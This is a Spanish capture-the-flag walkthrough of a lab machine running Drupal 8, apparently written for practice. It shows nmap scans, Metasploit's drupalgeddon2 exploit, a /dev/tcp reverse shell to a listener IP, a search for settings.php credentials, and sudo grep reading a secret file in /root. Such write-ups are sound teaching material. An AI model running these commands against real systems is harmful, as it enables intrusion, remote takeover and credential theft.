FindYourStyle
✍️ Autor: El Pingüino de Mario🔍 Dificultad: Fácil 📅 Fecha de creación: 16/10/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP está abierto por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 172.17.0.2
para que nos proporcione más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web que está alojada a través de un Drupal 8.

🚀 EXPLOTACIÓN
Esta versión contiene varios exploits pero voy a explotar uno concretamente con Metasploit.
msfconsole
search drupal 8
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOSTS 172.17.0.2
exploit


En meterpreter.
shell
bash -i
find / -name settings.php 2>/dev/null

Nos mandamos una Reverse Shell.
/bin/bash -i >& /dev/tcp/192.168.255.136/443 0>&1
Nos ponemos en escucha.
nc -lvnp 443

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar. No tenemos permisos SUDO.
Nos logueamos con el usuario ballenita que hemos encontrado.

Nos llama la atención grep por lo que buscamos en esta página cómo explotarlo. Vamos a leer si hay en el directorio de /root
.
sudo -u root /bin/ls /root/
sudo grep '' /root/secretitomaximo.txt

Nos convertirnos en root con esas credenciales.

Last updated
Was this helpful?